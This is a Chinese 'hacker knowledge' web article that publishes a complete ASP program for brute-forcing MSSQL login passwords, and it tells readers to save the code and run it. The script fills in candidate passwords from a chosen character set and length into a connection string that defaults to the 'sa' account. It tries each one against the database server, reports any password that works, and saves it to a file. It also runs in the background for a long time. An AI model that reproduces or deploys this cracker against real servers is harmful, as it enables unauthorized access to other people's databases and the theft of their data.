首 页 ┆ 源码下载 ┆ IT学院 ┆ 字体下载 ┆ 模板下载 ┆ 源码发布 ┆ 广告合作 ┆ 网站地图 ┆ 虚拟主机 ┆ 中文域名
► 设为首页
► 加入收藏
► 联系我们
源码下载 >> ASP源码 | PHP源码 | ASP.net源码 | JSP源码 | CGI源码 | VC/C++源码 | VB源码 | Delphi源码 | Flash源码
文章学院 >> 网络编程 | 网页设计 | 图形图象 | 数据库 | 服务器 | 网络媒体 | 网络安全 | 操作系统 | 办公软件 | 软件开发 | 黑客知识
字体下载 >> 精制字体 | 非英字体 | 艺术字体 | 著名字体 | 哥特式 | 简单字体 | 手写体 | 节假日 | 图案字体 | 精度像素 | 中文字体
模板下载 >> 企业门户 | 数码网络 | 休闲娱乐 | 影视音乐 | 旅游名胜 | 文化艺术 | 电子商务 | 个性展示 | 登陆导航 | Flash模板
►►您当前的位置:源码园 → IT学院 → 黑客知识 → 黑客入门 → 文章内容

暴力破解MSSQL用户密码的ASP程序--暴力,破解,MSSQL,用户,密码,ASP,程序

作者:佚名  来源:网上收集  发布时间:2006-10-20 17:12:28
一个暴力破解MSSQL用户密码的ASP程序,最早发布在EST论坛。以下这个版本是可以运行之后关闭浏览器,运行完毕将在当前目录生成结果文件的。 用ASP做事情效率很慢,当然这个程序所体现的不是它的效率,而是……给你点悬念,不然多没意思哦。

自己把以下代码保存为ASP文件。当然我还是一如既往的BS那些只改作者名字的家伙。
<%
'============ ASP Port Scanner by lake2 ===================
'http://lake2.0x54.org
'Version: 0.1
'For SpringBoard
'==========================================================
%>
<style type="text/css">
body,td,th {color: #0000FF;font-family: Verdana, Arial, Helvetica, sans-serif;}
body {background-color: #ffffff;font-size:14px; }
a:link {color: #0000FF;text-decoration: none;}
a:visited {text-decoration: none;color: #0000FF;}
a:hover {text-decoration: none;color: #FF0000;}
a:active {text-decoration: none;color: #FF0000;}
.buttom {color: #FFFFFF; border: 1px solid #084B8E; background-color: #719BC5}
.TextBox {border: 1px solid #084B8E}
.styleRed {color: #FF0000}
</style>
<title>MSSQL Cracker for SpringBoard</title>
<%
Dim Password()
If Request.Form("go") <> "1" Then
%>
 <div align="center">Welcome to <a href="http://lake2.0x54.org" target="_blank">http://lake2.0x54.org</a> </div>
 <form name="form1" method="post" action="" >
 ConnStr:
 <input name="conn" type="text" class="TextBox" id="conn" value="Provider=SQLOLEDB.1;Data Source=127.0.0.1;User ID=sa;Password={PASS};" size="70">
 <br>
 Char:     
 <input name="char" type="text" class="TextBox" id="char" value="0123456789" size="30">
   <br>
Length:  
<input name="len" type="text" class="TextBox" id="len" value="3" size="4">
<br>
Path:     
<input name="path" type="text" class="TextBox" value="<%=Server.MapPath("r.txt")%>" size="50">
<input name="CFile" type="checkbox" class="TextBox" id="CFile" value="1" checked>
Enablel<br>
<input name="go" type="hidden" id="go" value="1">
<br>
<input name="Submit" type="submit" class="buttom" id="Submit" value=" Run ">
</form>
<%
Else
 timer1 = timer
 Server.ScriptTimeout = 7776000
 ConnStr = Request.Form("Conn")
 Char = request.Form("char")
 LenChar = Len(Char)
 ReDim password(LenChar)
 For i = 1 to LenChar
 password(i) = Mid(Char, i, 1)
 Next
 length = CInt(request.Form("len"))
 Call LAKE("")
 response.Write "Done!<br>Process " & tTime & " s"
 If request.Form("CFile") <> "" Then CreateResult("Done!" & vbcrlf & tTime)
End If

Sub LAKE(str)
 If Len(str) >= length Then Exit Sub
 For j = 1 to LenChar
 pass = str & password(j)
 If Len(pass) = length Then Call Crack(pass)
 Call LAKE(pass)
 Next
End Sub

Sub Crack(str)
 On Error Resume Next
 Set conn = Server.CreateObject("ADODB.connection")
 conn.open Replace(ConnStr,"{PASS}",str)
 If Err Then
 If Err.Number <> -2147217843 Then
 response.Write(Err.Description & "<BR>")
 response.End()
 End If
 Else
 response.Write("I Get it ! Password is <font color=red>" & str & "</font><BR>Process " & tTime & " s")
 If request.Form("CFile") <> "" Then CreateResult(str & vbcrlf & tTime)
 response.End()
 End If
End Sub

Function tTime()
 timer2 = timer
 thetime=cstr(int(timer2-timer1))
 tTime = thetime
End Function

Sub CreateResult(t)
 Set fs = CreateObject("Scripting.FileSystemObject")
 Set outfile = fs.CreateTextFile(request.Form("path"))
 outfile.WriteLine t
 Set fs = Nothing
End Sub
%>
[] [返回上一页] [打 印]
  • 上一篇文章:IISPutScanner v1.0扫描入侵工具使用教程--IISPutScanner,v1.0,扫描,入侵,工具,使用教程
  • 下一篇文章:Universal Extractor 功能强大的 Unpack 工具(汉化版)--Universal Extractor,功能强大,Unpack,工具,汉化版

  • 相关文章:
  • 搞Linux安全的注意了,现在有SSH的暴力破解软件
  • 黑客攻击技术之暴力破解法--黑客,攻击,技术,暴力,破...
  • PHP程序中的常见漏洞--PHP,程序,常见漏洞
  • ASP的程序拿到WEBSHELL的方法--ASP,程序,WEBSHELL,方...
  • 暴力破解MSSQL用户密码的ASP程序--暴力,破解,MSSQL,...
  • 保护共享软件不被暴力破解--保护,共享软件,暴力破解...
  • 入侵检测PHP程序中的目录遍历漏洞--入侵,检测,PHP,程...
关于本站 - 网站帮助 - 广告合作 - 下载声明 - 友情连接 - 网站地图 - 源码发布
Copyright © 2003-2009 Ymyasp.Com. All Rights Reserved .
备案序号:粤ICP备07029071号